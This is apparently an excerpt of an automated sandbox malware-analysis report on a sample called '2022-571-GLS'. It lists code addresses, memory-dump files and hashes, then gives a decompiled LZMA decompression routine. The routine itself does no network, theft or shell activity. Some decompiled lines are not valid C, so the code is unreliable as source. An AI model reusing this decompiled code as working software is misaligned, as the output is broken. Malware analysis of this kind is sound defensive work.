                          0x004064a2
                          0x004064a4
                          0x004064a4
                          0x004064a4
                          0x004064a7
                          0x004064aa
                          0x004064aa
                          0x004064aa
                          0x004064b0
                          0x00000000
                          0x00000000
                          0x004064b2
                          0x004064b5
                          0x004064b8
                          0x004064bb
                          0x004064be
                          0x004064c1
                          0x004064c4
                          0x004064c7
                          0x004064ca
                          0x004064cd
                          0x004064d0
                          0x004064e8
                          0x004064eb
                          0x004064ee
                          0x004064f1
                          0x004064f1
                          0x004064f4
                          0x004064f8
                          0x004064fa
                          0x004064d2
                          0x004064d2
                          0x004064da
                          0x004064df
                          0x004064e1
                          0x004064e3
                          0x004064e3
                          0x004064fd
                          0x00406504
                          0x00406507
                          0x00000000
                          0x00406509
                          0x00000000
                          0x00406509
                          0x00406507
                          0x0040650e
                          0x0040650e
                          0x0040650e
                          0x0040650e
                          0x00000000
                          0x00000000
                          0x00406549
                          0x00406549
                          0x0040654d
                          0x00406b55
                          0x00000000
                          0x00406b55
                          0x00406553
                          0x00406556
                          0x00406559
                          0x0040655d
                          0x00406560
                          0x00406566
                          0x00406568
                          0x00406568
                          0x00406568
                          0x0040656b
                          0x0040656e
                          0x0040656e
                          0x00406574
                          0x00406512
                          0x00406512
                          0x00406515
                          0x00000000
                          0x00406515
                          0x00406576
                          0x00406576
                          0x00406579
                          0x0040657c
                          0x0040657f
                          0x00406582
                          0x00406585
                          0x00406588
                          0x0040658b
                          0x0040658e
                          0x00406591
                          0x00406594
                          0x004065ac
                          0x004065af
                          0x004065b2
                          0x004065b5
                          0x004065b5
                          0x004065b8
                          0x004065bc
                          0x004065be
                          0x00406596
                          0x00406596
                          0x0040659e
                          0x004065a3
                          0x004065a5
                          0x004065a7
                          0x004065a7
                          0x004065c1
                          0x004065c8
                          0x004065cb
                          0x00000000
                          0x004065cd
                          0x00000000
                          0x004065cd
                          0x00000000
                          0x0040685a
                          0x0040685a
                          0x0040685e
                          0x00406b85
                          0x00000000
                          0x00406b85
                          0x00406864
                          0x00406867
                          0x0040686a
                          0x0040686e
                          0x00406871
                          0x00406877
                          0x00406879
                          0x00406879
                          0x00406879
                          0x0040687c
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00406969
                          0x0040696d
                          0x0040698f
                          0x00406992
                          0x0040699c
                          0x00000000
                          0x0040699c
                          0x0040696f
                          0x00406972
                          0x00406976
                          0x00406979
                          0x00406979
                          0x0040697c
                          0x00000000
                          0x00000000
                          0x00406a26
                          0x00406a2a
                          0x00406a48
                          0x00406a48
                          0x00406a48
                          0x00406a4f
                          0x00406a56
                          0x00406a5d
                          0x00406a5d
                          0x00000000
                          0x00406a5d
                          0x00406a2c
                          0x00406a2f
                          0x00406a32
                          0x00406a35
                          0x00406a3c
                          0x00406980
                          0x00406980
                          0x00406983
                          0x00000000
                          0x00000000
                          0x00406b17
                          0x00406b1a
                          0x00000000
                          0x00000000
                          0x00406751
                          0x00406753
                          0x0040675a
                          0x0040675b
                          0x0040675d
                          0x00406760
                          0x00000000
                          0x00000000
                          0x00406768
                          0x0040676b
                          0x0040676e
                          0x00406770
                          0x00406772
                          0x00406772
                          0x00406773
                          0x00406776
                          0x0040677d
                          0x00406780
                          0x0040678e
                          0x00000000
                          0x00000000
                          0x00406a64
                          0x00406a64
                          0x00406a67
                          0x00406a6e
                          0x00000000
                          0x00000000
                          0x00406a73
                          0x00406a73
                          0x00406a77
                          0x00406baf
                          0x00000000
                          0x00406baf
                          0x00406a7d
                          0x00406a80
                          0x00406a83
                          0x00406a87
                          0x00406a8a
                          0x00406a90
                          0x00406a92
                          0x00406a92
                          0x00406a92
                          0x00406a95
                          0x00406a98
                          0x00406a98
                          0x00406a98
                          0x00406a98
                          0x00406a9b
                          0x00406a9b
                          0x00406a9f
                          0x00406aff
                          0x00406b02
                          0x00406b07
                          0x00406b08
                          0x00406b0a
                          0x00406b0c
                          0x00406b0f
                          0x00000000
                          0x00406b0f
                          0x00406aa1
                          0x00406aa7
                          0x00406aaa
                          0x00406aad
                          0x00406ab0
                          0x00406ab3
                          0x00406ab6
                          0x00406ab9
                          0x00406abc
                          0x00406abf
                          0x00406ac2
                          0x00406adb
                          0x00406ade
                          0x00406ae1
                          0x00406ae4
                          0x00406ae8
                          0x00406aea
                          0x00406aea
                          0x00406aeb
                          0x00406aee
                          0x00406ac4
                          0x00406ac4
                          0x00406acc
                          0x00406ad1
                          0x00406ad3
                          0x00406ad6
                          0x00406ad6
                          0x00406af1
                          0x00406af8
                          0x00000000
                          0x00406afa
                          0x00000000
                          0x00406afa
                          0x00000000
                          0x00406796
                          0x00406799
                          0x004067cf
                          0x004068ff
                          0x004068ff
                          0x004068ff
                          0x004068ff
                          0x00406902
                          0x00406902
                          0x00406905
                          0x00406907
                          0x00406b91
                          0x00000000
                          0x00406b91
                          0x0040690d
                          0x00406910
                          0x00000000
                          0x00000000
                          0x00406916
                          0x0040691a
                          0x0040691d
                          0x0040691d
                          0x0040691d
                          0x00000000
                          0x0040691d
                          0x0040679b
                          0x0040679d
                          0x0040679f
                          0x004067a1
                          0x004067a4
                          0x004067a5
                          0x004067a7
                          0x004067a9
                          0x004067ac
                          0x004067af
                          0x004067c5
                          0x004067ca
                          0x00406802
                          0x00406802
                          0x00406806
                          0x00406832
                          0x00406834
                          0x0040683b
                          0x0040683e
                          0x00406841
                          0x00406841
                          0x00406846
                          0x00406846
                          0x00406848
                          0x0040684b
                          0x00406852
                          0x00406855
                          0x00406882
                          0x00406882
                          0x00406885
                          0x00406888
                          0x004068fc
                          0x004068fc
                          0x004068fc
                          0x00000000
                          0x004068fc
                          0x0040688a
                          0x00406890
                          0x00406893
                          0x00406896
                          0x00406899
                          0x0040689c
                          0x0040689f
                          0x004068a2
                          0x004068a5
                          0x004068a8
                          0x004068ab
                          0x004068c4
                          0x004068c6
                          0x004068c9
                          0x004068ca
                          0x004068cd
                          0x004068cf
                          0x004068d2
                          0x004068d4
                          0x004068d6
                          0x004068d9
                          0x004068db
                          0x004068de
                          0x004068e2
                          0x004068e4
                          0x004068e4
                          0x004068e5
                          0x004068e8
                          0x004068eb
                          0x004068ad
                          0x004068ad
                          0x004068b5
                          0x004068ba
                          0x004068bc
                          0x004068bf
                          0x004068bf
                          0x004068ee
                          0x004068f5
                          0x0040687f
                          0x0040687f
                          0x0040687f
                          0x0040687f
                          0x00000000
                          0x004068f7
                          0x00000000
                          0x004068f7
                          0x004068f5
                          0x00406808
                          0x0040680b
                          0x0040680d
                          0x00406810
                          0x00406813
                          0x00406816
                          0x00406818
                          0x0040681b
                          0x0040681e
                          0x0040681e
                          0x00406821
                          0x00406821
                          0x00406824
                          0x0040682b
                          0x004067ff
                          0x004067ff
                          0x004067ff
                          0x004067ff
                          0x00000000
                          0x0040682d
                          0x00000000
                          0x0040682d
                          0x0040682b
                          0x004067b1
                          0x004067b4
                          0x004067b6
                          0x004067b9
                          0x00000000
                          0x00000000
                          0x00406518
                          0x00406518
                          0x0040651c
                          0x00406b61
                          0x00000000
                          0x00406b61
                          0x00406522
                          0x00406525
                          0x00406528
                          0x0040652b
                          0x0040652e
                          0x00406531
                          0x00406534
                          0x00406536
                          0x00406539
                          0x0040653c
                          0x0040653f
                          0x00406541
                          0x00406541
                          0x00406541
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00406920
                          0x00406920
                          0x00406920
                          0x00406924
                          0x00000000
                          0x00000000
                          0x0040692a
                          0x0040692d
                          0x00406930
                          0x00406933
                          0x00406935
                          0x00406935
                          0x00406935
                          0x00406938
                          0x0040693b
                          0x0040693e
                          0x00406941
                          0x00406944
                          0x00406947
                          0x00406948
                          0x0040694a
                          0x0040694a
                          0x0040694a
                          0x0040694d
                          0x00406950
                          0x00406953
                          0x00406956
                          0x00406959
                          0x0040695d
                          0x0040695f
                          0x00406962
                          0x00000000
                          0x00406964
                          0x00000000
                          0x00406964
                          0x00406962
                          0x00406b97
                          0x00000000
                          0x00000000
                          0x004061c6

                          Memory Dump Source
                          • Source File: 00000000.00000002.305499046.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.305491871.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.305515929.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.305527626.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.305565989.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.305616553.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.305629363.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.305634480.000000000042D000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_2022-571-GLS.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 112a48c21f92b6a8e33e5cbf0d578aa67701f3a308a0143f1b2e2e22e9c0a048
                          • Instruction ID: 56628f401a4fc6d73e137493fcd66a1037cbd66c5efac646bb7951d26cabb475
                          • Opcode Fuzzy Hash: 112a48c21f92b6a8e33e5cbf0d578aa67701f3a308a0143f1b2e2e22e9c0a048
                          • Instruction Fuzzy Hash: CF815871D00228CFDF24CFA8C8447ADBBB1FB45305F25816AD856BB281D7789A96DF44
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 00406184 Relevance: 5.2, APIs: 4, Instructions: 198COMMON
                          Download Yara Rule
                          C-Code - Quality: 98%
                          			E00406184(void* __ecx) {
				void* _v8;
				void* _v12;
				signed int _v16;
				unsigned int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				signed int _v95;
				signed int _v96;
				signed int _v100;
				signed int _v104;
				signed int _v108;
				signed int _v112;
				signed int _v116;
				signed int _v120;
				intOrPtr _v124;
				signed int _v128;
				signed int _v132;
				signed int _v136;
				void _v140;
				void* _v148;
				signed int _t537;
				signed int _t538;
				signed int _t572;

				_t572 = 0x22;
				_v148 = __ecx;
				memcpy( &_v140, __ecx, _t572 << 2);
				if(_v52 == 0xffffffff) {
					return 1;
				}
				while(1) {
					L3:
					_t537 = _v140;
					if(_t537 > 0x1c) {
						break;
					}
					switch( *((intOrPtr*)(_t537 * 4 +  &M00406BD6))) {
						case 0:
							__eflags = _v112;
							if(_v112 == 0) {
								goto L173;
							}
							_v112 = _v112 - 1;
							_v116 = _v116 + 1;
							_t537 =  *_v116;
							__eflags = _t537 - 0xe1;
							if(_t537 > 0xe1) {
								goto L174;
							}
							_t542 = _t537 & 0x000000ff;
							_push(0x2d);
							asm("cdq");
							_pop(_t576);
							_push(9);
							_pop(_t577);
							_t622 = _t542 / _t576;
							_t544 = _t542 % _t576 & 0x000000ff;
							asm("cdq");
							_t617 = _t544 % _t577 & 0x000000ff;
							_v64 = _t617;
							_v32 = (1 << _t622) - 1;
							_v28 = (1 << _t544 / _t577) - 1;
							_t625 = (0x300 << _t617 + _t622) + 0x736;
							__eflags = 0x600 - _v124;
							if(0x600 == _v124) {
								L12:
								__eflags = _t625;
								if(_t625 == 0) {
									L14:
									_v76 = _v76 & 0x00000000;
									_v68 = _v68 & 0x00000000;
									goto L17;
								} else {
									goto L13;
								}
								do {
									L13:
									_t625 = _t625 - 1;
									__eflags = _t625;
									 *((short*)(_v8 + _t625 * 2)) = 0x400;
								} while (_t625 != 0);
								goto L14;
							}
							__eflags = _v8;
							if(_v8 != 0) {
								GlobalFree(_v8);
							}
							_t537 = GlobalAlloc(0x40, 0x600); // executed
							__eflags = _t537;
							_v8 = _t537;
							if(_t537 == 0) {
								goto L174;
							} else {
								_v124 = 0x600;
								goto L12;
							}
						case 1:
							L15:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 1;
								goto L173;
							}
							_v112 = _v112 - 1;
							_v68 = _v68 | ( *_v116 & 0x000000ff) << _v76 << 0x00000003;
							_v116 = _v116 + 1;
							_t50 =  &_v76;
							 *_t50 = _v76 + 1;
							__eflags =  *_t50;
							L17:
							__eflags = _v76 - 4;
							if(_v76 < 4) {
								goto L15;
							}
							_t550 = _v68;
							__eflags = _t550 - _v120;
							if(_t550 == _v120) {
								L22:
								_v76 = 5;
								 *(_v12 + _v120 - 1) =  *(_v12 + _v120 - 1) & 0x00000000;
								goto L25;
							}
							__eflags = _v12;
							_v120 = _t550;
							if(_v12 != 0) {
								GlobalFree(_v12);
							}
							_t537 = GlobalAlloc(0x40, _v68); // executed
							__eflags = _t537;
							_v12 = _t537;
							if(_t537 == 0) {
								goto L174;
							} else {
								goto L22;
							}
						case 2:
							L26:
							_t557 = _v100 & _v32;
							_v136 = 6;
							_v80 = _t557;
							_t626 = _v8 + ((_v60 << 4) + _t557) * 2;
							goto L135;
						case 3:
							L23:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 3;
								goto L173;
							}
							_v112 = _v112 - 1;
							_t72 =  &_v116;
							 *_t72 = _v116 + 1;
							__eflags =  *_t72;
							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							L25:
							_v76 = _v76 - 1;
							__eflags = _v76;
							if(_v76 != 0) {
								goto L23;
							}
							goto L26;
						case 4:
							L136:
							_t559 =  *_t626;
							_t610 = _t559 & 0x0000ffff;
							_t591 = (_v20 >> 0xb) * _t610;
							__eflags = _v16 - _t591;
							if(_v16 >= _t591) {
								_v20 = _v20 - _t591;
								_v16 = _v16 - _t591;
								_v68 = 1;
								_t560 = _t559 - (_t559 >> 5);
								__eflags = _t560;
								 *_t626 = _t560;
							} else {
								_v20 = _t591;
								_v68 = _v68 & 0x00000000;
								 *_t626 = (0x800 - _t610 >> 5) + _t559;
							}
							__eflags = _v20 - 0x1000000;
							if(_v20 >= 0x1000000) {
								goto L142;
							} else {
								goto L140;
							}
						case 5:
							L140:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 5;
								goto L173;
							}
							_v20 = _v20 << 8;
							_v112 = _v112 - 1;
							_t464 =  &_v116;
							 *_t464 = _v116 + 1;
							__eflags =  *_t464;
							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							L142:
							_t561 = _v136;
							goto L143;
						case 6:
							__edx = 0;
							__eflags = _v68;
							if(_v68 != 0) {
								__eax = _v8;
								__ecx = _v60;
								_v56 = 1;
								_v136 = 7;
								__esi = _v8 + 0x180 + _v60 * 2;
								goto L135;
							}
							__eax = _v96 & 0x000000ff;
							__esi = _v100;
							__cl = 8;
							__cl = 8 - _v64;
							__esi = _v100 & _v28;
							__eax = (_v96 & 0x000000ff) >> 8;
							__ecx = _v64;
							__esi = (_v100 & _v28) << 8;
							__ecx = _v8;
							((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8) = ((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8) + (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8)) * 2;
							__eax = ((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8) + (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8)) * 2 << 9;
							__eflags = _v60 - 4;
							__eax = (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8) + (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8)) * 2 << 9) + _v8 + 0xe6c;
							_v92 = (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8) + (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8)) * 2 << 9) + _v8 + 0xe6c;
							if(_v60 >= 4) {
								__eflags = _v60 - 0xa;
								if(_v60 >= 0xa) {
									_t103 =  &_v60;
									 *_t103 = _v60 - 6;
									__eflags =  *_t103;
								} else {
									_v60 = _v60 - 3;
								}
							} else {
								_v60 = 0;
							}
							__eflags = _v56 - __edx;
							if(_v56 == __edx) {
								__ebx = 0;
								__ebx = 1;
								goto L63;
							}
							__eax = _v24;
							__eax = _v24 - _v48;
							__eflags = __eax - _v120;
							if(__eax >= _v120) {
								__eax = __eax + _v120;
								__eflags = __eax;
							}
							__ecx = _v12;
							__ebx = 0;
							__ebx = 1;
							__al =  *((intOrPtr*)(__eax + __ecx));
							_v95 =  *((intOrPtr*)(__eax + __ecx));
							goto L43;
						case 7:
							__eflags = _v68 - 1;
							if(_v68 != 1) {
								__eax = _v40;
								_v132 = 0x16;
								_v36 = _v40;
								__eax = _v44;
								_v40 = _v44;
								__eax = _v48;
								_v44 = _v48;
								__eax = 0;
								__eflags = _v60 - 7;
								0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
								__al = __al & 0x000000fd;
								__eax = (__eflags >= 0) - 1 + 0xa;
								_v60 = (__eflags >= 0) - 1 + 0xa;
								__eax = _v8;
								__eax = _v8 + 0x664;
								__eflags = __eax;
								_v92 = __eax;
								goto L71;
							}
							__eax = _v8;
							__ecx = _v60;
							_v136 = 8;
							__esi = _v8 + 0x198 + _v60 * 2;
							goto L135;
						case 8:
							__eflags = _v68;
							if(_v68 != 0) {
								__eax = _v8;
								__ecx = _v60;
								_v136 = 0xa;
								__esi = _v8 + 0x1b0 + _v60 * 2;
							} else {
								__eax = _v60;
								__ecx = _v8;
								__eax = _v60 + 0xf;
								_v136 = 9;
								_v60 + 0xf << 4 = (_v60 + 0xf << 4) + _v80;
								__esi = _v8 + ((_v60 + 0xf << 4) + _v80) * 2;
							}
							goto L135;
						case 9:
							__eflags = _v68;
							if(_v68 != 0) {
								goto L92;
							}
							__eflags = _v100;
							if(_v100 == 0) {
								goto L174;
							}
							__eax = 0;
							__eflags = _v60 - 7;
							_t264 = _v60 - 7 >= 0;
							__eflags = _t264;
							0 | _t264 = _t264 + _t264 + 9;
							_v60 = _t264 + _t264 + 9;
							goto L78;
						case 0xa:
							__eflags = _v68;
							if(_v68 != 0) {
								__eax = _v8;
								__ecx = _v60;
								_v136 = 0xb;
								__esi = _v8 + 0x1c8 + _v60 * 2;
								goto L135;
							}
							__eax = _v44;
							goto L91;
						case 0xb:
							__eflags = _v68;
							if(_v68 != 0) {
								__ecx = _v40;
								__eax = _v36;
								_v36 = _v40;
							} else {
								__eax = _v40;
							}
							__ecx = _v44;
							_v40 = _v44;
							L91:
							__ecx = _v48;
							_v48 = __eax;
							_v44 = _v48;
							L92:
							__eax = _v8;
							_v132 = 0x15;
							__eax = _v8 + 0xa68;
							_v92 = _v8 + 0xa68;
							goto L71;
						case 0xc:
							L102:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 0xc;
								goto L173;
							}
							__ecx = _v116;
							__eax = _v16;
							_v20 = _v20 << 8;
							__ecx =  *_v116 & 0x000000ff;
							_v112 = _v112 - 1;
							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							_t340 =  &_v116;
							 *_t340 = _v116 + 1;
							__eflags =  *_t340;
							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							__eax = _v48;
							goto L104;
						case 0xd:
							L39:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 0xd;
								goto L173;
							}
							__ecx = _v116;
							__eax = _v16;
							_v20 = _v20 << 8;
							__ecx =  *_v116 & 0x000000ff;
							_v112 = _v112 - 1;
							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							_t127 =  &_v116;
							 *_t127 = _v116 + 1;
							__eflags =  *_t127;
							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							L41:
							__eax = _v68;
							__eflags = _v76 - _v68;
							if(_v76 != _v68) {
								goto L50;
							}
							__eflags = __ebx - 0x100;
							if(__ebx >= 0x100) {
								goto L56;
							}
							L43:
							__eax = _v95 & 0x000000ff;
							_v95 = _v95 << 1;
							__ecx = _v92;
							__eax = (_v95 & 0x000000ff) >> 7;
							_v76 = __eax;
							__eax = __eax + 1;
							__eax = __eax << 8;
							__eax = __eax + __ebx;
							__esi = _v92 + __eax * 2;
							_v20 = _v20 >> 0xb;
							__ax =  *__esi;
							_v88 = __esi;
							__edx = __ax & 0x0000ffff;
							__ecx = (_v20 >> 0xb) * __edx;
							__eflags = _v16 - __ecx;
							if(_v16 >= __ecx) {
								_v20 = _v20 - __ecx;
								_v16 = _v16 - __ecx;
								__cx = __ax;
								_v68 = 1;
								__cx = __ax >> 5;
								__eflags = __eax;
								__ebx = __ebx + __ebx + 1;
								 *__esi = __ax;
							} else {
								_v68 = _v68 & 0x00000000;
								_v20 = __ecx;
								0x800 = 0x800 - __edx;
								0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
								__ebx = __ebx + __ebx;
								 *__esi = __cx;
							}
							__eflags = _v20 - 0x1000000;
							_v72 = __ebx;
							if(_v20 >= 0x1000000) {
								goto L41;
							} else {
								goto L39;
							}
						case 0xe:
							L48:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 0xe;
								goto L173;
							}
							__ecx = _v116;
							__eax = _v16;
							_v20 = _v20 << 8;
							__ecx =  *_v116 & 0x000000ff;
							_v112 = _v112 - 1;
							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							_t161 =  &_v116;
							 *_t161 = _v116 + 1;
							__eflags =  *_t161;
							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							while(1) {
								L50:
								__eflags = __ebx - 0x100;
								if(__ebx >= 0x100) {
									break;
								}
								__eax = _v92;
								__edx = __ebx + __ebx;
								__ecx = _v20;
								__esi = __edx + __eax;
								__ecx = _v20 >> 0xb;
								__ax =  *__esi;
								_v88 = __esi;
								__edi = __ax & 0x0000ffff;
								__ecx = (_v20 >> 0xb) * __edi;
								__eflags = _v16 - __ecx;
								if(_v16 >= __ecx) {
									_v20 = _v20 - __ecx;
									_v16 = _v16 - __ecx;
									__cx = __ax;
									_t175 = __edx + 1; // 0x1
									__ebx = _t175;
									__cx = __ax >> 5;
									__eflags = __eax;
									 *__esi = __ax;
								} else {
									_v20 = __ecx;
									0x800 = 0x800 - __edi;
									0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
									__ebx = __ebx + __ebx;
									 *__esi = __cx;
								}
								__eflags = _v20 - 0x1000000;
								_v72 = __ebx;
								if(_v20 >= 0x1000000) {
									continue;
								} else {
									goto L48;
								}
							}
							L56:
							_t178 =  &_v56;
							 *_t178 = _v56 & 0x00000000;
							__eflags =  *_t178;
							goto L57;
						case 0xf:
							L60:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 0xf;
								goto L173;
							}
							__ecx = _v116;
							__eax = _v16;
							_v20 = _v20 << 8;
							__ecx =  *_v116 & 0x000000ff;
							_v112 = _v112 - 1;
							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							_t208 =  &_v116;
							 *_t208 = _v116 + 1;
							__eflags =  *_t208;
							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							L62:
							__eflags = __ebx - 0x100;
							if(__ebx >= 0x100) {
								L57:
								__al = _v72;
								_v96 = _v72;
								goto L58;
							}
							L63:
							__eax = _v92;
							__edx = __ebx + __ebx;
							__ecx = _v20;
							__esi = __edx + __eax;
							__ecx = _v20 >> 0xb;
							__ax =  *__esi;
							_v88 = __esi;
							__edi = __ax & 0x0000ffff;
							__ecx = (_v20 >> 0xb) * __edi;
							__eflags = _v16 - __ecx;
							if(_v16 >= __ecx) {
								_v20 = _v20 - __ecx;
								_v16 = _v16 - __ecx;
								__cx = __ax;
								_t222 = __edx + 1; // 0x1
								__ebx = _t222;
								__cx = __ax >> 5;
								__eflags = __eax;
								 *__esi = __ax;
							} else {
								_v20 = __ecx;
								0x800 = 0x800 - __edi;
								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
								__ebx = __ebx + __ebx;
								 *__esi = __cx;
							}
							__eflags = _v20 - 0x1000000;
							_v72 = __ebx;
							if(_v20 >= 0x1000000) {
								goto L62;
							} else {
								goto L60;
							}
						case 0x10:
							L112:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 0x10;
								goto L173;
							}
							__ecx = _v116;
							__eax = _v16;
							_v20 = _v20 << 8;
							__ecx =  *_v116 & 0x000000ff;
							_v112 = _v112 - 1;
							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							_t371 =  &_v116;
							 *_t371 = _v116 + 1;
							__eflags =  *_t371;
							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							goto L114;
						case 0x11:
							L71:
							__esi = _v92;
							_v136 = 0x12;
							goto L135;
						case 0x12:
							__eflags = _v68;
							if(_v68 != 0) {
								__eax = _v92;
								_v136 = 0x13;
								__esi = _v92 + 2;
								L135:
								_v88 = _t626;
								goto L136;
							}
							__eax = _v80;
							_v52 = _v52 & 0x00000000;
							__ecx = _v92;
							__eax = _v80 << 4;
							__eflags = __eax;
							__eax = _v92 + __eax + 4;
							goto L133;
						case 0x13:
							__eflags = _v68;
							if(_v68 != 0) {
								_t475 =  &_v92;
								 *_t475 = _v92 + 0x204;
								__eflags =  *_t475;
								_v52 = 0x10;
								_v68 = 8;
								L147:
								_v128 = 0x14;
								goto L148;
							}
							__eax = _v80;
							__ecx = _v92;
							__eax = _v80 << 4;
							_v52 = 8;
							__eax = _v92 + (_v80 << 4) + 0x104;
							L133:
							_v92 = __eax;
							_v68 = 3;
							goto L147;
						case 0x14:
							_v52 = _v52 + __ebx;
							__eax = _v132;
							goto L143;
						case 0x15:
							__eax = 0;
							__eflags = _v60 - 7;
							0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
							__al = __al & 0x000000fd;
							__eax = (__eflags >= 0) - 1 + 0xb;
							_v60 = (__eflags >= 0) - 1 + 0xb;
							goto L123;
						case 0x16:
							__eax = _v52;
							__eflags = __eax - 4;
							if(__eax >= 4) {
								_push(3);
								_pop(__eax);
							}
							__ecx = _v8;
							_v68 = 6;
							__eax = __eax << 7;
							_v128 = 0x19;
							_v92 = __eax;
							goto L148;
						case 0x17:
							L148:
							__eax = _v68;
							_v84 = 1;
							_v76 = _v68;
							goto L152;
						case 0x18:
							L149:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 0x18;
								goto L173;
							}
							__ecx = _v116;
							__eax = _v16;
							_v20 = _v20 << 8;
							__ecx =  *_v116 & 0x000000ff;
							_v112 = _v112 - 1;
							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							_t490 =  &_v116;
							 *_t490 = _v116 + 1;
							__eflags =  *_t490;
							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							L151:
							_t493 =  &_v76;
							 *_t493 = _v76 - 1;
							__eflags =  *_t493;
							L152:
							__eflags = _v76;
							if(_v76 <= 0) {
								__ecx = _v68;
								__ebx = _v84;
								0 = 1;
								__eax = 1 << __cl;
								__ebx = _v84 - (1 << __cl);
								__eax = _v128;
								_v72 = __ebx;
								L143:
								_v140 = _t561;
								goto L3;
							}
							__eax = _v84;
							_v20 = _v20 >> 0xb;
							__edx = _v84 + _v84;
							__eax = _v92;
							__esi = __edx + __eax;
							_v88 = __esi;
							__ax =  *__esi;
							__edi = __ax & 0x0000ffff;
							__ecx = (_v20 >> 0xb) * __edi;
							__eflags = _v16 - __ecx;
							if(_v16 >= __ecx) {
								_v20 = _v20 - __ecx;
								_v16 = _v16 - __ecx;
								__cx = __ax;
								__cx = __ax >> 5;
								__eax = __eax - __ecx;
								__edx = __edx + 1;
								__eflags = __edx;
								 *__esi = __ax;
								_v84 = __edx;
							} else {
								_v20 = __ecx;
								0x800 = 0x800 - __edi;
								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
								_v84 = _v84 << 1;
								 *__esi = __cx;
							}
							__eflags = _v20 - 0x1000000;
							if(_v20 >= 0x1000000) {
								goto L151;
							} else {
								goto L149;
							}
						case 0x19:
							__eflags = __ebx - 4;
							if(__ebx < 4) {
								_v48 = __ebx;
								L122:
								_t399 =  &_v48;
								 *_t399 = _v48 + 1;
								__eflags =  *_t399;
								L123:
								__eax = _v48;
								__eflags = __eax;
								if(__eax == 0) {
									_v52 = _v52 | 0xffffffff;
									goto L173;
								}
								__eflags = __eax - _v100;
								if(__eax > _v100) {
									goto L174;
								}
								_v52 = _v52 + 2;
								__eax = _v52;
								_t406 =  &_v100;
								 *_t406 = _v100 + _v52;
								__eflags =  *_t406;
								goto L126;
							}
							__ecx = __ebx;
							__eax = __ebx;
							__ecx = __ebx >> 1;
							__eax = __ebx & 0x00000001;
							__ecx = (__ebx >> 1) - 1;
							__al = __al | 0x00000002;
							__eax = (__ebx & 0x00000001) << __cl;
							__eflags = __ebx - 0xe;
							_v48 = __eax;
							if(__ebx >= 0xe) {
								__ebx = 0;
								_v76 = __ecx;
								L105:
								__eflags = _v76;
								if(_v76 <= 0) {
									__eax = __eax + __ebx;
									_v68 = 4;
									_v48 = __eax;
									__eax = _v8;
									__eax = _v8 + 0x644;
									__eflags = __eax;
									L111:
									__ebx = 0;
									_v92 = __eax;
									_v84 = 1;
									_v72 = 0;
									_v76 = 0;
									L115:
									__eax = _v68;
									__eflags = _v76 - _v68;
									if(_v76 >= _v68) {
										_t397 =  &_v48;
										 *_t397 = _v48 + __ebx;
										__eflags =  *_t397;
										goto L122;
									}
									__eax = _v84;
									_v20 = _v20 >> 0xb;
									__edi = _v84 + _v84;
									__eax = _v92;
									__esi = __edi + __eax;
